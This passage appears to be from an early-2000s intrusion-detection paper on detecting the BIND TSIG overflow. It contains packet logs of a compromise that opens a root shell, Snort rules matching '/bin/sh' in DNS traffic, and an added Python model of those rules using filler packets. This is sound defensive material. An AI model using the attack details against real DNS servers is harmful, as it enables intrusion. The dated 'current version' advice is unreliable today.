=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:21.864093 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6768 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB35 Ack: 0x71CE0F1 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 937183 275287865
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:22.994188 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6770 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x657DB35 Ack: 0x71CE0F1 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 937296 275287865
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:22.995025 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x42
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61861 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x71CE0F1 Ack: 0x657DB36 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287980 937296
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:22.996131 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x42
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61862 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x71CE0F1 Ack: 0x657DB36 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287980 937296
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:22.996233 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6772 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB36 Ack: 0x71CE0F2 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 937296 275287980
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The following output is from tcpdump (using ./tcpdump), which was also running when the attack took place (it has been shortened for brevity):

15:33:19.465555 ATTACKER.1024 > VICTOM.domain: 48879 inv_q+ [b2&3=0x980] (476)
15:33:19.469874 VICTOM.domain > ATTACKER.1024: 48879 inv_q FormErr [0q][|domain]
15:33:19.472301 ATTACKER.1024 > VICTOM.domain: 57005+ [b2&3=0x180] [7q] [1au][|domain]
15:33:19.476199 VICTOM.domain > ATTACKER.1024: 57005 [7q][|domain]
15:33:19.476302 ATTACKER > VICTOM: icmp: ATTACKER udp port 1024 unreachable [tos 0xc0]
15:33:19.494214 ATTACKER.1032 > VICTOM.36864: S 106421026:106421026(0) win 32120
<mss 1460,sackOK,timestamp 936946[|tcp]> (DF)
15:33:19.495108 VICTOM.36864 > ATTACKER.1032: S 119332722:119332722(0)
ack 106421027 win 32120 <mss 1460,sackOK,timestamp 275287630[|tcp]> (DF)
15:33:19.495220 ATTACKER.1032 > VICTOM.36864: . ack 1 win 32120
<nop,nop,timestamp 936946 275287630> (DF)

The first two packets in both the snort and tcpdump output represent the initial IQUERY request and response. Tcpdump does an excellent job of capturing this traffic by decoding some of the application layer. We can see that the attacker sends the inverse query in the first packet, denoted by the "inv_q+". The second packet shows the victim responding with an error, denoted by the "inv_q FormErr". The first packet in this exchange triggers the following snort rule:

alert udp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"IDS277 - NAMED Iquery Probe"; content:
"|0980 0000 0001 0000 0000|"; offset: 2; depth: 16;)

The above rule is included in the standard ruleset from www.snort.org and will generate an alert each time an inverse query is performed. The next UDP packet is the bogus TSIG record that is sent from the attacker to the victim. The victim receives the TSIG record without the proper secure key, so the victim sends back an error. By this time the attacker's program has already launched the exploit and closed its source port (1024). The victim is not aware of this and sends the error message to that port anyway, which in turn generates the ICMP Port Unreachable packet. Right after the Port Unreachable message is when the TCP connection to the victim system begins. This can occur because the malicious shellcode that was just sent to the victim host has executed and is listening on that port, running as root. Now we have a "root shell" and can begin to execute commands on the remote host.

Further Detection & Defensive Recommendation

We really need to be able to detect (and log if possible) two things: the UDP packet containing the TSIG overflow (and shellcode), and the TCP connection that is made if the attack is successful. We want to know if someone is trying to compromise one of our machines, and if a TCP connection is made we can be almost positive that the machine has been compromised. The following snort rule takes care of these conditions:

activate udp any -> any 53 (msg:"Bind TSIG Overflow Attempt"; content: "|80 00 07 00 00
00 00 00 01 3F 00 01 02|/bin/sh"; tag: host, 300, seconds, src;)

The above rule will generate an alert when a UDP packet comes from any host on any port, whose destination is any host on port 53, and matches the signature in the content field. The message in the alert file will tell us that this is a Bind TSIG overflow attempt. The first part of the content field is the hex signature for a TSIG packet, and the second part tells snort to look for the string "/bin/sh". The last field is a brand new addition to the Snort Intrusion Detection System. The rule is "tagged" to grab all of the traffic to and from the host currently being attacked for the time specified (in this case 300 seconds). This provides us with the ability to detect this type of attack and capture every piece of data between victim and attacker, including every keystroke the attacker presses. It lets us see exactly what happened without alerting the attacker to our presence, unlike many host-based IDS systems that require files to be installed on your machines. We also do not have to log in to the victim host and poke around to see what happened, which destroys valuable evidence. The alert file (or wherever you send your snort alerts) will look like this:

[**] IDS277 - NAMED Iquery/Infoleak Probe [**]
03/04-10:53:05.742125 192.168.0.10:1291 -> 192.168.0.4:53
UDP TTL:64 TOS:0x0 ID:36981 IpLen:20 DgmLen:504
Len: 484

[**] Bind TSIG Overflow Attempt [**]
03/04-12:42:07.223768 192.168.0.10:1294 -> 192.168.0.4:53
UDP TTL:64 TOS:0x0 ID:38323 IpLen:20 DgmLen:538
Len: 518

The log for 192.168.0.4 will contain all the traffic between the two hosts in the exact same format as above when we were logging all traffic on the network.
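As an added example (not code from this paper, and not Snort itself), here is a small Python model of the two rules above: the IDS277 inverse-query probe with its offset/depth constraints, the TSIG overflow rule, and the "tag: host, 300, seconds, src" behaviour that logs all traffic to and from the host that sent the alerting packet for 300 seconds. The packets it runs over are constructed; their DNS headers copy the leading bytes shown in the dumps above and everything after the header is filler, not shellcode. One caveat the model makes explicit: in Snort's syntax, hex bytes and text inside a single content option form one contiguous pattern, so the rule as written would require "/bin/sh" to follow the 02 byte directly; the model instead applies the two parts as separate matches, which is what the explanation above describes.

```python
# Added example: a model of the two Snort rules discussed in the text,
# run over constructed packets. Not the paper's code and not Snort's.
import struct
from dataclasses import dataclass

# Byte patterns copied from the two rules in the text.
IQUERY_SIG = bytes.fromhex("0980 0000 0001 0000 0000")                 # IDS277 content
TSIG_SIG = bytes.fromhex("80 00 07 00 00 00 00 00 01 3F 00 01 02")     # TSIG rule, hex part
SHELL_STR = b"/bin/sh"                                                 # TSIG rule, text part
TAG_SECONDS = 300                                                      # tag: host, 300, seconds, src


@dataclass
class Packet:
    """Minimal decoded packet (constructed; no capture library involved)."""
    ts: float
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    payload: bytes


def dns_header(payload):
    """Decode the 12-byte DNS header (RFC 1035). Opcode 1 is IQUERY."""
    if len(payload) < 12:
        return None
    ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:12])
    return {"id": ident, "qr": flags >> 15, "opcode": (flags >> 11) & 0xF,
            "rcode": flags & 0xF, "qdcount": qd, "ancount": an,
            "nscount": ns, "arcount": ar}


def content_match(payload, pattern, offset=0, depth=None):
    """Emulate Snort's content/offset/depth: start at byte `offset` and
    examine at most `depth` bytes from there (all remaining bytes if None)."""
    window = payload[offset:] if depth is None else payload[offset:offset + depth]
    return pattern in window


def is_iquery_probe(pkt):
    """IDS277: UDP to port 53, IQUERY header bytes at offset 2, depth 16."""
    return (pkt.proto == "udp" and pkt.dport == 53
            and content_match(pkt.payload, IQUERY_SIG, offset=2, depth=16))


def is_tsig_overflow(pkt):
    """TSIG rule as the text describes it: hex signature AND the "/bin/sh" string."""
    return (pkt.proto == "udp" and pkt.dport == 53
            and content_match(pkt.payload, TSIG_SIG)
            and content_match(pkt.payload, SHELL_STR))


class Detector:
    """Applies both rules and models tagging of the alerting packet's source host."""

    def __init__(self):
        self.alerts = []          # (message, packet)
        self.tagged = {}          # host -> timestamp until which its traffic is logged
        self.tagged_packets = []  # packets captured because a host was tagged

    def _in_tagged_window(self, pkt):
        for host in (pkt.src, pkt.dst):
            expiry = self.tagged.get(host)
            if expiry is not None and pkt.ts <= expiry:
                return True
        return False

    def process(self, pkt):
        if self._in_tagged_window(pkt):
            self.tagged_packets.append(pkt)
        if is_iquery_probe(pkt):
            self.alerts.append(("IDS277 - NAMED Iquery Probe", pkt))
        if is_tsig_overflow(pkt):
            self.alerts.append(("Bind TSIG Overflow Attempt", pkt))
            self.tagged[pkt.src] = pkt.ts + TAG_SECONDS   # tag: host, ..., src


# Constructed sample payloads: the DNS headers copy the first bytes of the
# dumps above (IQUERY flags 0x0980; TSIG query with 7 questions, 1 additional);
# the bytes after each header are filler.
IQUERY_PAYLOAD = bytes.fromhex("BEEF 0980 0000 0001 0000 0000") + b"\x3e" + bytes(63)
TSIG_PAYLOAD = (bytes.fromhex("DEAD 0180 0007 0000 0000 0001 3F00 0102")
                + b"A" * 200 + SHELL_STR + b"\x00" + b"A" * 100)
NORMAL_QUERY = (struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
                + b"\x03www\x07example\x03com\x00" + b"\x00\x01\x00\x01")

T0 = 1000.0
SAMPLE_TRAFFIC = [  # constructed, hosts as in the alert file above
    Packet(T0,         "192.168.0.10", 1291, "192.168.0.4", 53, "udp", IQUERY_PAYLOAD),
    Packet(T0 + 0.007, "192.168.0.10", 1294, "192.168.0.4", 53, "udp", TSIG_PAYLOAD),
    Packet(T0 + 0.030, "192.168.0.10", 1032, "192.168.0.4", 36864, "tcp", b""),
    Packet(T0 + 0.050, "192.168.0.4", 36864, "192.168.0.10", 1032, "tcp", b"Linux ...\n"),
    Packet(T0 + 1.0,   "192.168.0.20", 2000, "192.168.0.4", 53, "udp", NORMAL_QUERY),
    Packet(T0 + 400.0, "192.168.0.10", 1040, "192.168.0.4", 36864, "tcp", b""),  # tag expired
]


def run_sample():
    """Run the detector over the constructed traffic and return it for inspection."""
    det = Detector()
    for pkt in SAMPLE_TRAFFIC:
        det.process(pkt)
    return det


if __name__ == "__main__":
    det = run_sample()
    for msg, pkt in det.alerts:
        print(f"[**] {msg} [**]\n{pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport}\n")
    print("packets logged by the tag:", len(det.tagged_packets))
```

Running the block prints the two alerts in the same "[**] msg [**]" style as the alert file above and reports that the two TCP packets between attacker and victim inside the 300-second window were logged by the tag, while the unrelated query and the packet arriving after the window expired were not.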

Adding the above rules to your snort IDS and monitoring it closely will provide you with the necessary tools to successfully detect this attack. You should also put your DNS servers behind the firewall and block all ports other than 53/udp (and maybe 53/tcp, with a filter to prevent zone transfers and TCP port scanning). This will prevent attackers from being able to start a root shell on higher port numbers, such as 36864 as shown in the example above. You should also add egress filtering to your router and/or firewall to prevent your DNS server from sending out traffic it does not have to (i.e. mail, FTP, telnet, etc.). This way, even if the attack is successful, the hacker cannot launch attacks onto other machines, or at least is limited in what they can do. The host, especially a high-profile machine like your DNS server, should have some sort of host-based intrusion detection (such as Portsentry http://www.psionic.com and/or Fcheck http://www.geocities.com/fcheck2000). Portsentry will log every connection attempt to each port that you tell it to, and Fcheck performs checksum operations on your binaries (or any other type of file) and alerts you to changes. Finally, always be sure that you are on the most current release of Bind, which at this time is Bind 9.1.0 (http://www.isc.org/products/BIND/bind9.html) in the Bind 9.x series, Bind 8.2.3-REL (http://www.isc.org/products/BIND/bind8.html) in the Bind 8.x series, and Bind 4.9.8 (http://www.isc.org/products/BIND/bind4.html) in the 4.x series [3].

Update: The LION worm

On March 23, 2001 SANS issued an alert describing the LION worm (http://www.sans.org/y2k/lion.htm). This worm attacks Red Hat Linux systems using the Bind TSIG buffer overflow. The program scans class B networks looking for vulnerable DNS servers. When it finds a vulnerable host, the host is compromised, the t0rn root kit is installed along with multiple backdoors and trojaned binaries, and logging is disabled. Since this worm uses the Bind TSIG attack I submitted my rule to intrusion@sans.org and it was posted to the web site (http://www.sans.org/y2k/032601.htm). Even though the worm disables logging on the target system, snort will allow you to see the data travel across the network using the rule above. This new worm heightened awareness of the Bind TSIG attack, and as a result many new snort rules were written. These rules cover the different strains of the Bind TSIG attack, including Lion. From www.whitehats.com, here are the current rules:
  • IDS482/named-exploit-tsig-infoleak (CAN-2001-0012)
  • IDS489/named-exploit-tsig-lsd (CAN-2001-0010)
  • IDS490/named-exploit-tsig-lucysoft (CAN-2001-0010)
  • IDS491/named-exploit-tsig-tsig0wn (CAN-2001-0010)
Any one of these rules can be wrapped with the activation features shown above, and I expect that once snort 1.7.1 is released all rules that are triggered by buffer overflows will use this feature. A document on how to prevent becoming infected with the Lion worm can be found at http://www.sans.org/y2k/lion_protection.htm.

Acknowledgments

Special thanks to Martin Roesch for personally helping me utilize the newer (and relatively untested at the time) features of snort to create the detection rule presented in this paper. Snort is one of the best examples of how successful an open source project can be.

References

[1] Aleph One. "Smashing The Stack." Phrack Magazine Volume Seven, Issue Forty-Nine 10-20.

[2] Cohen, Cory F. Cert Coordination Center. "ISC BIND 8 contains buffer overflow in transaction signature (TSIG) handling code". Vulnerability Note VU#196945. URL: http://www.kb.cert.org/vuls/id/196945 (1 Mar. 2001).

[3] Internet Software Consortium. "Bind Vulnerabilities" URL: http://www.isc.org/products/BIND/bind-security.html (15 Feb 2001).

[4] Lanza, Jeffrey P., Cohen, Cory. "CERT Advisory CA-2001-02 Multiple Vulnerabilities in BIND". CERT/CC. 29 January 2001. URL: http://www.cert.org/advisories/CA-2001-02.html (22 Feb. 2001).

[5] Mixter. "Writing buffer overflow exploits - a tutorial for beginners" URL: http://members.tripod.com/mixtersecurity/exploit.txt (12 Feb 2001).

[6] Osborne, Anthony, McDonald, John. "Vulnerabilities in BIND 4 and 8". 29 January 2001. URL: http://www.pgp.com/research/covert/advisories/047.asp (10 Feb. 2001).

[7] Roesch, Martin. Advanced Intrusion Detection: Snort Style. The SANS Institute, 2001. 139 - 150.